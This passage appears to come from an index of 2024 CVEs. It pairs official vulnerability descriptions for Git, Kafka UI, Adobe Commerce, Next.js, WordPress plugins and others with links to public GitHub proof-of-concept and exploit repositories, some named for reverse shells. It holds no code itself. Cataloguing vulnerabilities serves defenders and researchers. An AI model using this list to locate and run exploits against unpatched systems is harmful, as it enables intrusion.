- [10cks/CVE-2024-32002-smash](https://github.com/10cks/CVE-2024-32002-smash)
- [10cks/CVE-2024-32002-linux-hulk](https://github.com/10cks/CVE-2024-32002-linux-hulk)
- [10cks/CVE-2024-32002-linux-submod](https://github.com/10cks/CVE-2024-32002-linux-submod)
- [10cks/CVE-2024-32002-linux-smash](https://github.com/10cks/CVE-2024-32002-linux-smash)
- [aitorcastel/poc_CVE-2024-32002](https://github.com/aitorcastel/poc_CVE-2024-32002)
- [aitorcastel/poc_CVE-2024-32002_submodule](https://github.com/aitorcastel/poc_CVE-2024-32002_submodule)
- [10cks/hook](https://github.com/10cks/hook)
- [jweny/CVE-2024-32002_HOOK](https://github.com/jweny/CVE-2024-32002_HOOK)
- [jweny/CVE-2024-32002_EXP](https://github.com/jweny/CVE-2024-32002_EXP)
- [CrackerCat/CVE-2024-32002_EXP](https://github.com/CrackerCat/CVE-2024-32002_EXP)
- [Roronoawjd/hook](https://github.com/Roronoawjd/hook)
- [Roronoawjd/git_rce](https://github.com/Roronoawjd/git_rce)
- [JJoosh/CVE-2024-32002-Reverse-Shell](https://github.com/JJoosh/CVE-2024-32002-Reverse-Shell)
- [1mxml/CVE-2024-32002-poc](https://github.com/1mxml/CVE-2024-32002-poc)
- [bfengj/CVE-2024-32002-hook](https://github.com/bfengj/CVE-2024-32002-hook)
- [ycdxsb/CVE-2024-32002-hulk](https://github.com/ycdxsb/CVE-2024-32002-hulk)
- [ycdxsb/CVE-2024-32002-submod](https://github.com/ycdxsb/CVE-2024-32002-submod)
- [bfengj/CVE-2024-32002-Exploit](https://github.com/bfengj/CVE-2024-32002-Exploit)
- [vincepsh/CVE-2024-32002](https://github.com/vincepsh/CVE-2024-32002)
- [vincepsh/CVE-2024-32002-hook](https://github.com/vincepsh/CVE-2024-32002-hook)
- [JJoosh/CVE-2024-32002](https://github.com/JJoosh/CVE-2024-32002)
- [10cks/CVE-2024-32002-EXP](https://github.com/10cks/CVE-2024-32002-EXP)
- [WOOOOONG/CVE-2024-32002](https://github.com/WOOOOONG/CVE-2024-32002)
- [WOOOOONG/hook](https://github.com/WOOOOONG/hook)
- [fadhilthomas/poc-cve-2024-32002](https://github.com/fadhilthomas/poc-cve-2024-32002)
- [fadhilthomas/hook](https://github.com/fadhilthomas/hook)
- [JakobTheDev/cve-2024-32002-submodule-aw](https://github.com/JakobTheDev/cve-2024-32002-submodule-aw)
- [JakobTheDev/cve-2024-32002-poc-aw](https://github.com/JakobTheDev/cve-2024-32002-poc-aw)
- [Goplush/CVE-2024-32002-git-rce](https://github.com/Goplush/CVE-2024-32002-git-rce)
- [431m/rcetest](https://github.com/431m/rcetest)
- [AD-Appledog/CVE-2024-32002](https://github.com/AD-Appledog/CVE-2024-32002)
- [AD-Appledog/wakuwaku](https://github.com/AD-Appledog/wakuwaku)
- [tobelight/cve_2024_32002](https://github.com/tobelight/cve_2024_32002)
- [Basyaact/CVE-2024-32002-PoC_Chinese](https://github.com/Basyaact/CVE-2024-32002-PoC_Chinese)
- [EQSTLab/git_rce](https://github.com/EQSTLab/git_rce)
- [sysonlai/CVE-2024-32002-hook](https://github.com/sysonlai/CVE-2024-32002-hook)
- [TSY244/CVE-2024-32002-git-rce-father-poc](https://github.com/TSY244/CVE-2024-32002-git-rce-father-poc)
- [TSY244/CVE-2024-32002-git-rce](https://github.com/TSY244/CVE-2024-32002-git-rce)
- [blackninja23/CVE-2024-32002](https://github.com/blackninja23/CVE-2024-32002)
- [daemon-reconfig/CVE-2024-32002](https://github.com/daemon-reconfig/CVE-2024-32002)
- [charlesgargasson/CVE-2024-32002](https://github.com/charlesgargasson/CVE-2024-32002)
- [NishanthAnand21/CVE-2024-32002-PoC](https://github.com/NishanthAnand21/CVE-2024-32002-PoC)
- [FlojBoj/CVE-2024-32002](https://github.com/FlojBoj/CVE-2024-32002)
- [tiyeume25112004/CVE-2024-32002](https://github.com/tiyeume25112004/CVE-2024-32002)
- [chrisWalker11/running-CVE-2024-32002-locally-for-tesing](https://github.com/chrisWalker11/running-CVE-2024-32002-locally-for-tesing)
- [sanan2004/CVE-2024-32002](https://github.com/sanan2004/CVE-2024-32002)
- [Masamuneee/hook](https://github.com/Masamuneee/hook)
- [Masamuneee/CVE-2024-32002-POC](https://github.com/Masamuneee/CVE-2024-32002-POC)
- [th4s1s/CVE-2024-32002-PoC](https://github.com/th4s1s/CVE-2024-32002-PoC)
- [Julian-gmz/hook_CVE-2024-32002](https://github.com/Julian-gmz/hook_CVE-2024-32002)
- [grecosamuel/CVE-2024-32002](https://github.com/grecosamuel/CVE-2024-32002)

### CVE-2024-32004 (2024-05-14)

Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, an attacker can prepare a local repository in such a way that, when cloned, will execute arbitrary code during the operation. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid cloning repositories from untrusted sources.

- [Wadewfsssss/CVE-2024-32004](https://github.com/Wadewfsssss/CVE-2024-32004)
- [10cks/CVE-2024-32004-POC](https://github.com/10cks/CVE-2024-32004-POC)

### CVE-2024-32030 (2024-06-19)

Kafka UI is an Open-Source Web UI for Apache Kafka Management. Kafka UI API allows users to connect to different Kafka brokers by specifying their network address and port. As a separate feature, it also provides the ability to monitor the performance of Kafka brokers by connecting to their JMX ports. JMX is based on the RMI protocol, so it is inherently susceptible to deserialization attacks. A potential attacker can exploit this feature by connecting the Kafka UI backend to its own malicious broker. This vulnerability affects the deployments where one of the following occurs: 1. the dynamic.config.enabled property is set in settings. It's not enabled by default, but it's suggested to be enabled in many tutorials for Kafka UI, including its own README.md. OR 2. an attacker has access to the Kafka cluster that is being connected to Kafka UI. In this scenario the attacker can exploit this vulnerability to expand their access and execute code on Kafka UI as well. Instead of setting up a legitimate JMX port, an attacker can create an RMI listener that returns a malicious serialized object for any RMI call. In the worst case it could lead to remote code execution as Kafka UI has the required gadget chains in its classpath. This issue may lead to post-auth remote code execution. This is particularly dangerous as Kafka-UI does not have authentication enabled by default. This issue has been addressed in version 0.7.2. All users are advised to upgrade. There are no known workarounds for this vulnerability. These issues were discovered and reported by the GitHub Security Lab and are also tracked as GHSL-2023-230.

- [huseyinstif/CVE-2024-32030-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-32030-Nuclei-Template)

### CVE-2024-32104 (2024-04-15)

Cross-Site Request Forgery (CSRF) vulnerability in XLPlugins NextMove Lite. This issue affects NextMove Lite: from n/a through 2.18.1.

- [Cerberus-HiproPlus/CVE-2024-32104](https://github.com/Cerberus-HiproPlus/CVE-2024-32104)

### CVE-2024-32113 (2024-05-08)

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.13. Users are recommended to upgrade to version 18.12.13, which fixes the issue.

- [RacerZ-fighting/CVE-2024-32113-POC](https://github.com/RacerZ-fighting/CVE-2024-32113-POC)
- [Mr-xn/CVE-2024-32113](https://github.com/Mr-xn/CVE-2024-32113)
- [YongYe-Security/CVE-2024-32113](https://github.com/YongYe-Security/CVE-2024-32113)

### CVE-2024-32136 (2024-04-15)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Xenioushk BWL Advanced FAQ Manager. This issue affects BWL Advanced FAQ Manager: from n/a through 2.0.3.

- [xbz0n/CVE-2024-32136](https://github.com/xbz0n/CVE-2024-32136)

### CVE-2024-32205
- [Lucky-lm/CVE-2024-32205](https://github.com/Lucky-lm/CVE-2024-32205)

### CVE-2024-32238 (2024-04-22)

H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.

- [asdfjkl11/CVE-2024-32238](https://github.com/asdfjkl11/CVE-2024-32238)
- [FuBoLuSec/CVE-2024-32238](https://github.com/FuBoLuSec/CVE-2024-32238)

### CVE-2024-32258 (2024-04-23)

The network server of fceux 2.7.0 has a path traversal vulnerability, allowing attackers to overwrite any files on the server without authentication via a fake ROM.

- [liyansong2018/CVE-2024-32258](https://github.com/liyansong2018/CVE-2024-32258)

### CVE-2024-32369 (2024-05-07)

SQL Injection vulnerability in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a remote attacker to obtain sensitive information via a crafted payload to the start and limit parameters in the mliWhiteList.php component.

- [chucrutis/CVE-2024-32369](https://github.com/chucrutis/CVE-2024-32369)

### CVE-2024-32370 (2024-05-07)

An issue in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a remote attacker to obtain sensitive information via a crafted payload to the id parameter in the mliSystemUsers.php component.

- [chucrutis/CVE-2024-32370](https://github.com/chucrutis/CVE-2024-32370)

### CVE-2024-32371 (2024-05-07)

An issue in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a regular user account to escalate their privileges and gain administrative access by changing the type parameter from 1 to 0.

- [chucrutis/CVE-2024-32371](https://github.com/chucrutis/CVE-2024-32371)

### CVE-2024-32399 (2024-04-22)

Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.

- [NN0b0dy/CVE-2024-32399](https://github.com/NN0b0dy/CVE-2024-32399)

### CVE-2024-32459 (2024-04-22)

FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients and servers that use a version of FreeRDP prior to 3.5.0 or 2.11.6 are vulnerable to out-of-bounds read. Versions 3.5.0 and 2.11.6 patch the issue. No known workarounds are available.

- [absholi7ly/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-](https://github.com/absholi7ly/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-)

### CVE-2024-32523 (2024-05-17)

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in EverPress Mailster allows PHP Local File Inclusion. This issue affects Mailster: from n/a through 4.0.6.

- [truonghuuphuc/CVE-2024-32523-Poc](https://github.com/truonghuuphuc/CVE-2024-32523-Poc)

### CVE-2024-32640
- [Stuub/CVE-2024-32640-SQLI-MuraCMS](https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS)
- [0xYumeko/CVE-2024-32640-SQLI-MuraCMS](https://github.com/0xYumeko/CVE-2024-32640-SQLI-MuraCMS)
- [sammings/CVE-2024-32640](https://github.com/sammings/CVE-2024-32640)

### CVE-2024-32651 (2024-04-25)

changedetection.io is an open source web page change detection, website watcher, restock monitor and notification service. There is a Server Side Template Injection (SSTI) in Jinja2 that allows Remote Command Execution on the server host. Attackers can run any system command without any restriction and they could use a reverse shell. The impact is critical as the attacker can completely take over the server machine. This can be reduced if changedetection is behind a login page, but this isn't required by the application (not by default and not enforced).

- [zcrosman/cve-2024-32651](https://github.com/zcrosman/cve-2024-32651)
- [s0ck3t-s3c/CVE-2024-32651-changedetection-RCE](https://github.com/s0ck3t-s3c/CVE-2024-32651-changedetection-RCE)

### CVE-2024-32700 (2024-05-13)

Unrestricted Upload of File with Dangerous Type vulnerability in Kognetiks Kognetiks Chatbot for WordPress. This issue affects Kognetiks Chatbot for WordPress: from n/a through 2.0.0.

- [nastar-id/CVE-2024-32700](https://github.com/nastar-id/CVE-2024-32700)

### CVE-2024-32709 (2024-04-24)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Plechev Andrey WP-Recall. This issue affects WP-Recall: from n/a through 16.26.5.

- [truonghuuphuc/CVE-2024-32709-Poc](https://github.com/truonghuuphuc/CVE-2024-32709-Poc)

### CVE-2024-33111 (2024-05-06)

D-Link DIR-845L router <=v1.01KRb03 is vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.

- [FaLLenSKiLL1/CVE-2024-33111](https://github.com/FaLLenSKiLL1/CVE-2024-33111)

### CVE-2024-33113 (2024-05-06)

D-LINK DIR-845L <=v1.01KRb03 is vulnerable to Information disclosure via bsc_sms_inbox.php.

- [FaLLenSKiLL1/CVE-2024-33113](https://github.com/FaLLenSKiLL1/CVE-2024-33113)
- [tekua/CVE-2024-33113](https://github.com/tekua/CVE-2024-33113)

### CVE-2024-33209
- [paragbagul111/CVE-2024-33209](https://github.com/paragbagul111/CVE-2024-33209)

### CVE-2024-33210
- [paragbagul111/CVE-2024-33210](https://github.com/paragbagul111/CVE-2024-33210)

### CVE-2024-33231
- [fdzdev/CVE-2024-33231](https://github.com/fdzdev/CVE-2024-33231)

### CVE-2024-33352
- [mmiszczyk/CVE-2024-33352](https://github.com/mmiszczyk/CVE-2024-33352)

### CVE-2024-33438 (2024-04-29)

File Upload vulnerability in CubeCart before 6.5.5 allows an authenticated user to execute arbitrary code via a crafted .phar file.

- [julio-cfa/CVE-2024-33438](https://github.com/julio-cfa/CVE-2024-33438)

### CVE-2024-33453
- [Ant1sec-ops/CVE-2024-33453](https://github.com/Ant1sec-ops/CVE-2024-33453)

### CVE-2024-33559 (2024-04-29)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in 8theme XStore allows SQL Injection. This issue affects XStore: from n/a through 9.3.5.

- [absholi7ly/WordPress-XStore-theme-SQL-Injection](https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection)

### CVE-2024-33644 (2024-05-17)

Improper Control of Generation of Code ('Code Injection') vulnerability in WPCustomify Customify Site Library allows Code Injection. This issue affects Customify Site Library: from n/a through 0.0.9.

- [Akshath-Nagulapally/ReproducingCVEs_Akshath_Nagulapally](https://github.com/Akshath-Nagulapally/ReproducingCVEs_Akshath_Nagulapally)

### CVE-2024-33722
- [fuzzlove/soplanning-1.52-exploits](https://github.com/fuzzlove/soplanning-1.52-exploits)

### CVE-2024-33775 (2024-05-01)

An issue with the Autodiscover component in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted Dashlet.

- [Neo-XeD/CVE-2024-33775](https://github.com/Neo-XeD/CVE-2024-33775)

### CVE-2024-33883 (2024-04-28)

The ejs (aka Embedded JavaScript templates) package before 3.1.10 for Node.js lacks certain pollution protection.

- [Grantzile/PoC-CVE-2024-33883](https://github.com/Grantzile/PoC-CVE-2024-33883)

### CVE-2024-33911 (2024-05-02)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Weblizar School Management Pro. This issue affects School Management Pro: from n/a through 10.3.4.

- [xbz0n/CVE-2024-33911](https://github.com/xbz0n/CVE-2024-33911)

### CVE-2024-34102 (2024-06-13)

Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.

- [ArturArz1/TestCVE-2024-34102](https://github.com/ArturArz1/TestCVE-2024-34102)
- [th3gokul/CVE-2024-34102](https://github.com/th3gokul/CVE-2024-34102)
- [bigb0x/CVE-2024-34102](https://github.com/bigb0x/CVE-2024-34102)
- [11whoami99/CVE-2024-34102](https://github.com/11whoami99/CVE-2024-34102)
- [d0rb/CVE-2024-34102](https://github.com/d0rb/CVE-2024-34102)
- [Chocapikk/CVE-2024-34102](https://github.com/Chocapikk/CVE-2024-34102)
- [0x0d3ad/CVE-2024-34102](https://github.com/0x0d3ad/CVE-2024-34102)
- [cmsec423/CVE-2024-34102](https://github.com/cmsec423/CVE-2024-34102)
- [cmsec423/Magento-XXE-CVE-2024-34102](https://github.com/cmsec423/Magento-XXE-CVE-2024-34102)
- [jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento](https://github.com/jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento)
- [SamJUK/cosmicsting-validator](https://github.com/SamJUK/cosmicsting-validator)
- [unknownzerobit/poc](https://github.com/unknownzerobit/poc)
- [crynomore/CVE-2024-34102](https://github.com/crynomore/CVE-2024-34102)
- [bughuntar/CVE-2024-34102](https://github.com/bughuntar/CVE-2024-34102)
- [bughuntar/CVE-2024-34102-Python](https://github.com/bughuntar/CVE-2024-34102-Python)
- [Phantom-IN/CVE-2024-34102](https://github.com/Phantom-IN/CVE-2024-34102)
- [wubinworks/magento2-cosmic-sting-patch](https://github.com/wubinworks/magento2-cosmic-sting-patch)
- [EQSTLab/CVE-2024-34102](https://github.com/EQSTLab/CVE-2024-34102)
- [dream434/CVE-2024-34102](https://github.com/dream434/CVE-2024-34102)
- [bka/magento-cve-2024-34102-exploit-cosmicstring](https://github.com/bka/magento-cve-2024-34102-exploit-cosmicstring)

### CVE-2024-34144 (2024-05-02)

A sandbox bypass vulnerability involving crafted constructor bodies in Jenkins Script Security Plugin 1335.vf07d9ce377a_e and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.

- [MXWXZ/CVE-2024-34144](https://github.com/MXWXZ/CVE-2024-34144)

### CVE-2024-34220 (-)

Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the 'leave' parameter.

- [dovankha/CVE-2024-34220](https://github.com/dovankha/CVE-2024-34220)

### CVE-2024-34221 (-)

Sourcecodester Human Resource Management System 1.0 is vulnerable to Insecure Permissions resulting in privilege escalation.

- [dovankha/CVE-2024-34221](https://github.com/dovankha/CVE-2024-34221)

### CVE-2024-34222 (-)

Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the searccountry parameter.

- [dovankha/CVE-2024-34222](https://github.com/dovankha/CVE-2024-34222)

### CVE-2024-34223 (-)

Insecure permission vulnerability in /hrm/leaverequest.php in SourceCodester Human Resource Management System 1.0 allows attackers to approve or reject leave tickets.

- [dovankha/CVE-2024-34223](https://github.com/dovankha/CVE-2024-34223)

### CVE-2024-34224 (-)

Cross Site Scripting vulnerability in /php-lms/classes/Users.php?f=save in Computer Laboratory Management System using PHP and MySQL 1.0 allows remote attackers to inject arbitrary web script or HTML via the firstname, middlename and lastname parameters.

- [dovankha/CVE-2024-34224](https://github.com/dovankha/CVE-2024-34224)

### CVE-2024-34225 (-)

Cross Site Scripting vulnerability in php-lms/admin/?page=system_info in Computer Laboratory Management System using PHP and MySQL 1.0 allows remote attackers to inject arbitrary web script or HTML via the name and shortname parameters.

- [dovankha/CVE-2024-34225](https://github.com/dovankha/CVE-2024-34225)

### CVE-2024-34226 (-)

SQL injection vulnerability in /php-sqlite-vms/?page=manage_visitor&id=1 in SourceCodester Visitor Management System 1.0 allows attackers to execute arbitrary SQL commands via the id parameter.

- [dovankha/CVE-2024-34226](https://github.com/dovankha/CVE-2024-34226)

### CVE-2024-34310 (-)

Jin Fang Times Content Management System v3.2.3 was discovered to contain a SQL injection vulnerability via the id parameter.

- [3309899621/CVE-2024-34310](https://github.com/3309899621/CVE-2024-34310)

### CVE-2024-34312 (2024-06-24)

Virtual Programming Lab for Moodle up to v4.2.3 was discovered to contain a cross-site scripting (XSS) vulnerability via the component vplide.js.

- [vincentscode/CVE-2024-34312](https://github.com/vincentscode/CVE-2024-34312)

### CVE-2024-34313 (2024-06-24)

An issue in VPL Jail System up to v4.0.2 allows attackers to execute a directory traversal via a crafted request to a public endpoint.

- [vincentscode/CVE-2024-34313](https://github.com/vincentscode/CVE-2024-34313)

### CVE-2024-34329 (2024-07-22)

Insecure permissions in Entrust Datacard XPS Card Printer Driver 8.4 and earlier allows unauthenticated attackers to execute arbitrary code as SYSTEM via a crafted DLL payload.

- [pamoutaf/CVE-2024-34329](https://github.com/pamoutaf/CVE-2024-34329)

### CVE-2024-34350 (2024-05-09)

Next.js is a React framework that can provide building blocks to create web applications. Prior to 13.5.1, an inconsistent interpretation of a crafted HTTP request meant that requests are treated as both a single request, and two separate requests by Next.js, leading to desynchronized responses. This led to a response queue poisoning vulnerability in the affected Next.js versions. For a request to be exploitable, the affected route also had to be making use of the [rewrites](https://nextjs.org/docs/app/api-reference/next-config-js/rewrites) feature in Next.js. The vulnerability is resolved in Next.js `13.5.1` and newer.

- [Sudistark/rewrites-nextjs-CVE-2024-34350](https://github.com/Sudistark/rewrites-nextjs-CVE-2024-34350)

### CVE-2024-34351 (2024-05-09)

Next.js is a React framework that can provide building blocks to create web applications. A Server-Side Request Forgery (SSRF) vulnerability was identified in Next.js Server Actions. If the `Host` header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself. The required conditions are 1) Next.js is running in a self-hosted manner; 2) the Next.js application makes use of Server Actions; and 3) the Server Action performs a redirect to a relative path which starts with a `/`. This vulnerability was fixed in Next.js `14.1.1`.

- [Voorivex/CVE-2024-34351](https://github.com/Voorivex/CVE-2024-34351)
- [God4n/nextjs-CVE-2024-34351-_exploit](https://github.com/God4n/nextjs-CVE-2024-34351-_exploit)

### CVE-2024-34361 (2024-07-05)

Pi-hole is a DNS sinkhole that protects devices from unwanted content without installing any client-side software. A vulnerability in versions prior to 5.18.3 allows an authenticated user to make internal requests to the server via the `gravity_DownloadBlocklistFromUrl()` function. Depending on some circumstances, the vulnerability could lead to remote command execution. Version 5.18.3 contains a patch for this issue.

- [T0X1Cx/CVE-2024-34361-PiHole-SSRF-to-RCE](https://github.com/T0X1Cx/CVE-2024-34361-PiHole-SSRF-to-RCE)

### CVE-2024-34452 (2024-06-21)

CMSimple_XH 1.7.6 allows XSS by uploading a crafted SVG document.

- [surajhacx/CVE-2024-34452](https://github.com/surajhacx/CVE-2024-34452)

### CVE-2024-34463 (2024-09-03)

BPL Personal Weighing Scale PWS-01BT IND/09/18/599 devices send sensitive information in unencrypted BLE packets. (The packet data also lacks authentication and integrity protection.)

- [yash-chandna/CVE-2024-34463](https://github.com/yash-chandna/CVE-2024-34463)

### CVE-2024-34469 (2024-05-04)

Rukovoditel before 3.5.3 allows XSS via user_photo to index.php?module=users/registration&action=save.

- [Toxich4/CVE-2024-34469](https://github.com/Toxich4/CVE-2024-34469)

### CVE-2024-34470 (2024-05-06)

An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.

- [osvaldotenorio/CVE-2024-34470](https://github.com/osvaldotenorio/CVE-2024-34470)
- [bigb0x/CVE-2024-34470](https://github.com/bigb0x/CVE-2024-34470)
- [Cappricio-Securities/CVE-2024-34470](https://github.com/Cappricio-Securities/CVE-2024-34470)
- [Mr-r00t11/CVE-2024-34470](https://github.com/Mr-r00t11/CVE-2024-34470)
- [th3gokul/CVE-2024-34470](https://github.com/th3gokul/CVE-2024-34470)

### CVE-2024-34471 (2024-05-06)

An issue was discovered in HSC Mailinspector 5.2.17-3. A Path Traversal vulnerability (resulting in file deletion) exists in the mliRealtimeEmails.php file. The filename parameter in the export HTML functionality does not properly validate the file location, allowing an attacker to read and delete arbitrary files on the server. This was observed when the mliRealtimeEmails.php file itself was read and subsequently deleted, resulting in a 404 error for the file and disruption of email information loading.

- [osvaldotenorio/CVE-2024-34471](https://github.com/osvaldotenorio/CVE-2024-34471)

### CVE-2024-34472 (2024-05-06)

An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An authenticated blind SQL injection vulnerability exists in the mliRealtimeEmails.php file. The ordemGrid parameter in a POST request to /mailinspector/mliRealtimeEmails.php does not properly sanitize input, allowing an authenticated attacker to execute arbitrary SQL commands, leading to the potential disclosure of the entire application database.

- [osvaldotenorio/CVE-2024-34472](https://github.com/osvaldotenorio/CVE-2024-34472)

### CVE-2024-34474 (2024-05-05)

Clario through 2024-04-11 for Desktop has weak permissions for %PROGRAMDATA%\Clario and tries to load DLLs from there as SYSTEM.

- [Alaatk/CVE-2024-34474](https://github.com/Alaatk/CVE-2024-34474)

### CVE-2024-34582 (-)

Sunhillo SureLine through 8.10.0 on RICI 5000 devices allows cgi/usrPasswd.cgi userid_change XSS within the Forgot Password feature.

- [silent6trinity/CVE-2024-34582](https://github.com/silent6trinity/CVE-2024-34582)

### CVE-2024-34693 (2024-06-20)

Improper Input Validation vulnerability in Apache Superset, allows for an authenticated attacker to create a MariaDB connection with local_infile enabled. If both the MariaDB server (off by default) and the local mysql client on the web server are set to allow for local infile, it's possible for the attacker to execute a specific MySQL/MariaDB SQL command that is able to read files from the server and insert their content on a MariaDB database table. This issue affects Apache Superset: before 3.1.3 and version 4.0.0. Users are recommended to upgrade to version 4.0.1 or 3.1.3, which fixes the issue.

- [mbadanoiu/CVE-2024-34693](https://github.com/mbadanoiu/CVE-2024-34693)
- [Mr-r00t11/CVE-2024-34693](https://github.com/Mr-r00t11/CVE-2024-34693)

### CVE-2024-34716 (2024-05-14)

PrestaShop is an open source e-commerce web application. A cross-site scripting (XSS) vulnerability that only affects PrestaShops with customer-thread feature flag enabled is present starting from PrestaShop 8.1.0 and prior to PrestaShop 8.1.6. When the customer thread feature flag is enabled through the front-office contact form, a hacker can upload a malicious file containing an XSS that will be executed when an admin opens the attached file in back office. The script injected can access the session and the security token, which allows it to perform any authenticated action in the scope of the administrator's right. This vulnerability is patched in 8.1.6. A workaround is to disable the customer-thread feature-flag.

- [aelmokhtar/CVE-2024-34716](https://github.com/aelmokhtar/CVE-2024-34716)
- [TanveerS1ngh/Prestashop-CVE-2024-34716](https://github.com/TanveerS1ngh/Prestashop-CVE-2024-34716)

### CVE-2024-34739 (2024-08-15)

In shouldRestrictOverlayActivities of UsbProfileGroupSettingsManager.java, there is a possible escape from SUW due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.

- [uthrasri/CVE-2024-34739](https://github.com/uthrasri/CVE-2024-34739)

### CVE-2024-34741 (2024-08-15)

In setForceHideNonSystemOverlayWindowIfNeeded of WindowState.java, there is a possible way for message content to be visible on the screensaver while lock screen visibility settings are restricted by the user due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [uthrasri/CVE-2024-34741](https://github.com/uthrasri/CVE-2024-34741)

### CVE-2024-34831 (2024-09-10)

A cross-site scripting (XSS) vulnerability in Gibbon Core v26.0.00 allows an attacker to execute arbitrary code via the imageLink parameter in the library_manage_catalog_editProcess.php component.

- [enzored/CVE-2024-34831](https://github.com/enzored/CVE-2024-34831)

### CVE-2024-34832 (-)

Directory Traversal vulnerability in CubeCart v.6.5.5 and before allows an attacker to execute arbitrary code via a crafted file uploaded to the _g and node parameters.

- [julio-cfa/CVE-2024-34832](https://github.com/julio-cfa/CVE-2024-34832)

### CVE-2024-34833 (2024-06-17)

Sourcecodester Payroll Management System v1.0 is vulnerable to File Upload. Users can upload images via the "save_settings" page. An unauthenticated attacker can leverage this functionality to upload a malicious PHP file instead. Successful exploitation of this vulnerability results in the ability to execute arbitrary code as the user running the web server.

- [ShellUnease/CVE-2024-34833-payroll-management-system-rce](https://github.com/ShellUnease/CVE-2024-34833-payroll-management-system-rce)

### CVE-2024-34958 (-)

idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/banner_deal.php?mudi=add.

- [Gr-1m/CVE-2024-34958](https://github.com/Gr-1m/CVE-2024-34958)

### CVE-2024-35133 (2024-08-29)

IBM Security Verify Access 10.0.0 through 10.0.8 OIDC Provider could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim.

- [Ozozuz/Ozozuz-IBM-Security-Verify-CVE-2024-35133](https://github.com/Ozozuz/Ozozuz-IBM-Security-Verify-CVE-2024-35133)

### CVE-2024-35205 (-)

The WPS Office (aka cn.wps.moffice_eng) application before 17.0.0 for Android fails to properly sanitize file names before processing them through external application interactions, leading to a form of path traversal. This potentially enables any application to dispatch a crafted library file, aiming to overwrite an existing native library utilized by WPS Office. Successful exploitation could result in the execution of arbitrary commands under the guise of WPS Office's application ID.

- [cyb3r-w0lf/Dirty_Stream-Android-POC](https://github.com/cyb3r-w0lf/Dirty_Stream-Android-POC)

### CVE-2024-35242 (2024-06-10)

Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `composer install` command running inside a git/hg repository which has specially crafted branch names can lead to command injection. This requires cloning untrusted repositories. Patches are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid cloning potentially compromised repositories.

- [KKkai0315/CVE-2024-35242](https://github.com/KKkai0315/CVE-2024-35242)

### CVE-2024-35250 (2024-06-11)

Windows Kernel-Mode Driver Elevation of Privilege Vulnerability

- [varwara/CVE-2024-35250](https://github.com/varwara/CVE-2024-35250)
- [0xjiefeng/CVE-2024-35250-BOF](https://github.com/0xjiefeng/CVE-2024-35250-BOF)

### CVE-2024-35315
- [ewilded/CVE-2024-35315-POC](https://github.com/ewilded/CVE-2024-35315-POC)

### CVE-2024-35333 (-)

A stack-buffer-overflow vulnerability exists in the read_charset_decl function of html2xhtml 1.3. This vulnerability occurs due to improper bounds checking when copying data into a fixed-size stack buffer. An attacker can exploit this vulnerability by providing a specially crafted input to the vulnerable function, causing a buffer overflow and potentially leading to arbitrary code execution, denial of service, or data corruption.

- [momo1239/CVE-2024-35333](https://github.com/momo1239/CVE-2024-35333)

### CVE-2024-35468 (-)

A SQL injection vulnerability in /hrm/index.php in SourceCodester Human Resource Management System 1.0 allows attackers to execute arbitrary SQL commands via the password parameter.

- [dovankha/CVE-2024-35468](https://github.com/dovankha/CVE-2024-35468)

### CVE-2024-35469 (-)

A SQL injection vulnerability in /hrm/user/ in SourceCodester Human Resource Management System 1.0 allows attackers to execute arbitrary SQL commands via the password parameter.

